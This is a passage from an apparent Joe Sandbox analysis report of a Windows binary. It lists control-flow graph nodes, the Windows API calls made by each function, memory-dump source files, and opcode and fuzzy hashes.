      control_flow_graph 4011 7ff741ea2ce0-7ff741ea2d0a 4012 7ff741ea2d13-7ff741ea2d1b 4011->4012 4013 7ff741ea2d0c-7ff741ea2d0e 4011->4013 4015 7ff741ea2d2b 4012->4015 4016 7ff741ea2d1d-7ff741ea2d28 GetStdHandle 4012->4016 4014 7ff741ea2ea9-7ff741ea2ec4 call 7ff741ec2320 4013->4014 4018 7ff741ea2d31-7ff741ea2d3d 4015->4018 4016->4015 4020 7ff741ea2d3f-7ff741ea2d44 4018->4020 4021 7ff741ea2d86-7ff741ea2da2 WriteFile 4018->4021 4022 7ff741ea2daf-7ff741ea2db3 4020->4022 4023 7ff741ea2d46-7ff741ea2d7a WriteFile 4020->4023 4024 7ff741ea2da6-7ff741ea2da9 4021->4024 4026 7ff741ea2ea2-7ff741ea2ea6 4022->4026 4027 7ff741ea2db9-7ff741ea2dbd 4022->4027 4023->4024 4025 7ff741ea2d7c-7ff741ea2d82 4023->4025 4024->4022 4024->4026 4025->4023 4028 7ff741ea2d84 4025->4028 4026->4014 4027->4026 4029 7ff741ea2dc3-7ff741ea2dd8 call 7ff741e9b4f8 4027->4029 4028->4024 4032 7ff741ea2dda-7ff741ea2de1 4029->4032 4033 7ff741ea2e1e-7ff741ea2e6d call 7ff741ec797c call 7ff741e9129c call 7ff741e9bca8 4029->4033 4032->4018 4035 7ff741ea2de7-7ff741ea2de9 4032->4035 4033->4026 4044 7ff741ea2e6f-7ff741ea2e86 4033->4044 4035->4018 4037 7ff741ea2def-7ff741ea2e19 4035->4037 4037->4018 4045 7ff741ea2e88-7ff741ea2e9b 4044->4045 4046 7ff741ea2e9d call 7ff741ec220c 4044->4046 4045->4046 4047 7ff741ea2ec5-7ff741ea2ecb call 7ff741ec7904 4045->4047 4046->4026
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: FileWrite$Handle
      • String ID:
      • API String ID: 4209713984-0
      • Opcode ID: 95d7fd16c8d926fcf5da752308064adee905e679e75eda990adbc5c1a1c917ca
      • Instruction ID: 22b230276eaada174eddd77e64f732db795eac7a643b9a876bddb6b4a396c8f5
      • Opcode Fuzzy Hash: 95d7fd16c8d926fcf5da752308064adee905e679e75eda990adbc5c1a1c917ca
      • Instruction Fuzzy Hash: 3951E526B1D663D2FB12BB25D84477AA320FF45BD2F844131EA1D06A96DFBCE485C360
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn$TextWindow
      • String ID:
      • API String ID: 2912839123-0
      • Opcode ID: 34b731ebe9af3ba17aed105ea6cd5e0b01c3b8b12ff97f26908d03dc914b4b53
      • Instruction ID: 5f9398c73e944fc7940bb906db567af6302cdfeb0973c69b38cabdf430116e77
      • Opcode Fuzzy Hash: 34b731ebe9af3ba17aed105ea6cd5e0b01c3b8b12ff97f26908d03dc914b4b53
      • Instruction Fuzzy Hash: A651A36AF18762C5FB02BB64D8442ADA322BF45B95FC40231DA2C167D6EFBCD140C320
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
      • String ID:
      • API String ID: 2359106489-0
      • Opcode ID: 9d9d2995018f7f6f648ac6a5d97c5d37007cde808aee1d861722df7aa9659c46
      • Instruction ID: 9d96cebe3993cea4acf856368323a1b0758d76f2dede4c70fd9097fb075a9cd1
      • Opcode Fuzzy Hash: 9d9d2995018f7f6f648ac6a5d97c5d37007cde808aee1d861722df7aa9659c46
      • Instruction Fuzzy Hash: 0131C32AA0C662C2EB62BB25E54427AE351BF897D2FD40231EE9D42695DFBCD4458320
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
      • String ID:
      • API String ID: 1452418845-0
      • Opcode ID: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
      • Instruction ID: d51267c6ed1d93ddb8acb03b92359efcc18b8ac46d5bdacf8cd7a386dbdd0246
      • Opcode Fuzzy Hash: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
      • Instruction Fuzzy Hash: C6313B2DA0C223C5EB67BB65D8113B99791BF41386FC41434E90E072D7EFACA805C674
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: ErrorLast$FileHandleRead
      • String ID:
      • API String ID: 2244327787-0
      • Opcode ID: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
      • Instruction ID: 641ced07a31ee1e524c24ea92782028299c055e9eeca1573324cc5115a812eb6
      • Opcode Fuzzy Hash: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
      • Instruction Fuzzy Hash: D5219229B0C563C1EB617B21A40023DE7A0FF46BD6F944530DA5D5A686CFFCD8898720
      APIs
        • Part of subcall function 00007FF741EAECD8: ResetEvent.KERNEL32 ref: 00007FF741EAECF1
        • Part of subcall function 00007FF741EAECD8: ReleaseSemaphore.KERNEL32 ref: 00007FF741EAED07
      • ReleaseSemaphore.KERNEL32 ref: 00007FF741EAE974
      • CloseHandle.KERNELBASE ref: 00007FF741EAE993
      • DeleteCriticalSection.KERNEL32 ref: 00007FF741EAE9AA
      • CloseHandle.KERNEL32 ref: 00007FF741EAE9B7
        • Part of subcall function 00007FF741EAEA5C: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF741EAE95F,?,?,?,00007FF741EA463A,?,?,?), ref: 00007FF741EAEA63
        • Part of subcall function 00007FF741EAEA5C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF741EAE95F,?,?,?,00007FF741EA463A,?,?,?), ref: 00007FF741EAEA6E
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
      • String ID:
      • API String ID: 502429940-0
      • Opcode ID: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
      • Instruction ID: 9710dda36b9599d2831fffaba9877d5d6a0813803a6a755ec14790e0ca5b63b5
      • Opcode Fuzzy Hash: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
      • Instruction Fuzzy Hash: DC012D3AA18AA2D2E749BB21E55466DE370FB84BC1F444031DB6D03625CF79E4B58750
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: Thread$CreatePriority
      • String ID: CreateThread failed
      • API String ID: 2610526550-3849766595
      • Opcode ID: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
      • Instruction ID: dd8f10d8b4e99a446a9620a25a05f0546ffe2f3ceb608a3f282ae09787db7fbf
      • Opcode Fuzzy Hash: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
      • Instruction Fuzzy Hash: D2118639A1CA52D1EB12FB10E841569F361FB84786FD88131DA4E02665DFBCE585C760
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: DirectoryInitializeMallocSystem
      • String ID: riched20.dll
      • API String ID: 174490985-3360196438
      • Opcode ID: 0d85db053d286d1bd0fa19ead2840fc3f5149c6ee0f027e6ed6c33eb2c824e37
      • Instruction ID: 2f37edd79ad19eda324370fa79bc7df6f4213a01d24020c7175998b857b1a128
      • Opcode Fuzzy Hash: 0d85db053d286d1bd0fa19ead2840fc3f5149c6ee0f027e6ed6c33eb2c824e37
      • Instruction Fuzzy Hash: E7F03C79A1CA52D2EB02BF20E8142AEB3A0FB88755FC40135E98D42754DFBCE559CB10
      APIs
        • Part of subcall function 00007FF741EB853C: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF741EB856C
        • Part of subcall function 00007FF741EAAAE0: LoadStringW.USER32 ref: 00007FF741EAAB67
        • Part of subcall function 00007FF741EAAAE0: LoadStringW.USER32 ref: 00007FF741EAAB80
        • Part of subcall function 00007FF741E91FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E91FFB
        • Part of subcall function 00007FF741E9129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF741E91396
      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EC01BB
      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EC01C1
      • SendDlgItemMessageW.USER32 ref: 00007FF741EC01F2
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn$LoadString$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
      • String ID:
      • API String ID: 3106221260-0
      • Opcode ID: 7d1f69911a00d0741de56b49c262a8841e6eb375053cbff927e1aaae2ee712c8
      • Instruction ID: c0f55cdf2d7104facb9e856dd82bb6e213124545f1ce00a7da17418b6a3874f0
      • Opcode Fuzzy Hash: 7d1f69911a00d0741de56b49c262a8841e6eb375053cbff927e1aaae2ee712c8
      • Instruction Fuzzy Hash: BB51E06AF18662D6EB11BBA1D8002FDA362BB85BC5F800235DE1D177D6EFACD500C360
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
      • String ID:
      • API String ID: 2272807158-0
      • Opcode ID: 4ce248ffffd21e537046429b603db88a9fd2a3d13b10b45fb751dcef003d6319
      • Instruction ID: 0e20036a3199732e865cbd5c5c2e91c76a8058cc57baf48d7f567c540204635a
      • Opcode Fuzzy Hash: 4ce248ffffd21e537046429b603db88a9fd2a3d13b10b45fb751dcef003d6319
      • Instruction Fuzzy Hash: CA41C47AA0C792C2EB11BB15E444269A3A1FB85BB5F505334DFAD13AD6CFBCE4908710
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
      • String ID:
      • API String ID: 2176759853-0
      • Opcode ID: 324ad9725680782466c8b9226039195d64c3332d7d8035b24254b52cca95445d
      • Instruction ID: 0bcf352b9088e7dbb7a633ecb3042a0164fa54db9a03e4bac0df0f67899a3f3d
      • Opcode Fuzzy Hash: 324ad9725680782466c8b9226039195d64c3332d7d8035b24254b52cca95445d
      • Instruction Fuzzy Hash: E321B176A2CB9281EB11BB25A84017AA360FB89BD1F944231EF9D03B95DF7CE080C700
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: std::bad_alloc::bad_alloc
      • String ID:
      • API String ID: 1875163511-0
      • Opcode ID: 0ac8b931c67533783bb99e44ed512301af0920adb1b65b15738df05c1e7b1342
      • Instruction ID: 9e2ac00bab0fa9f358be02ed9bbd3d2f17a4a07a957b09827e075fe468cab1eb
      • Opcode Fuzzy Hash: 0ac8b931c67533783bb99e44ed512301af0920adb1b65b15738df05c1e7b1342
      • Instruction Fuzzy Hash: 96319E16A0C6A7D1EB26F714E4443B9E3A0FF54B85F944131D24C066AADFFDE946C311
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
      • String ID:
      • API String ID: 1203560049-0
      • Opcode ID: 523e4a483c86c9ac9ee543cf6c476d9bf2e9d6353514affc3e0f4067b8c7bc61
      • Instruction ID: eab598f333468e82c879d2faf5ba6ad4f767c223beb30ddc0bc93b9a56b32814
      • Opcode Fuzzy Hash: 523e4a483c86c9ac9ee543cf6c476d9bf2e9d6353514affc3e0f4067b8c7bc61
      • Instruction Fuzzy Hash: D5212836A0C792C2EB22BF25E445269A360FF88BD5F844230EA9D46695EF7CD541C650
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
      • String ID:
      • API String ID: 3118131910-0
      • Opcode ID: 9e0f12d03b62ccef14e62e4bf3878a3457daa81ed2db8d115c48a0739d4b379d
      • Instruction ID: df3aeb215726a18765c9565459975e7d12271b82e87942f7b95ad973343feed8
      • Opcode Fuzzy Hash: 9e0f12d03b62ccef14e62e4bf3878a3457daa81ed2db8d115c48a0739d4b379d
      • Instruction Fuzzy Hash: 0421D636A1C792C2EF11BB25E44422EA360FB88BD5F904231EA9D42A99DF7CD141C760
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
      • String ID:
      • API String ID: 1203560049-0
      • Opcode ID: d981565e32c06465bb9ca9e6032df0ff87469bcd01ee0110978b6e45bf249536
      • Instruction ID: 3fd03dc58140ec6b6563f5c902fc150d13a0d49ad5c72c5ea48804afa8d9e85c
      • Opcode Fuzzy Hash: d981565e32c06465bb9ca9e6032df0ff87469bcd01ee0110978b6e45bf249536
      • Instruction Fuzzy Hash: AD21A136A1C792C2EB11BB29E444129A361FB89BE5F940231EAAD43BE5DFBCD445C710
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: Process$CurrentExitTerminate
      • String ID:
      • API String ID: 1703294689-0
      • Opcode ID: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
      • Instruction ID: a1846f382e9379b2eb820050eea5e4f00f9be406f456b2b4a91ee7214c051621
      • Opcode Fuzzy Hash: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
      • Instruction Fuzzy Hash: 78E01A2CE0C367C6EB557B319C95779A3527F88783F545438C81E02396DEBEA44A8620
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: FolderPath
      • String ID: unknown_folder
      • API String ID: 1514166925-3920786785
      • Opcode ID: 41d51420171d2f749ce5f5a35542408828053397ebee158888822d07ea4c3c87
      • Instruction ID: b84d452a738b3db902a6c9afd7389438f872ff21d7b141bc5c40444b1f4021d7
      • Opcode Fuzzy Hash: 41d51420171d2f749ce5f5a35542408828053397ebee158888822d07ea4c3c87
      • Instruction Fuzzy Hash: 3B017C36718A9181EB21BB21B85579AB3A4FBC8B81F894135EE9D43B05DF3CD5018B00
      APIs
      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E9F895
      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E9F89B
        • Part of subcall function 00007FF741EA3EC8: FindClose.KERNELBASE(?,?,00000000,00007FF741EB0811), ref: 00007FF741EA3EFD
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
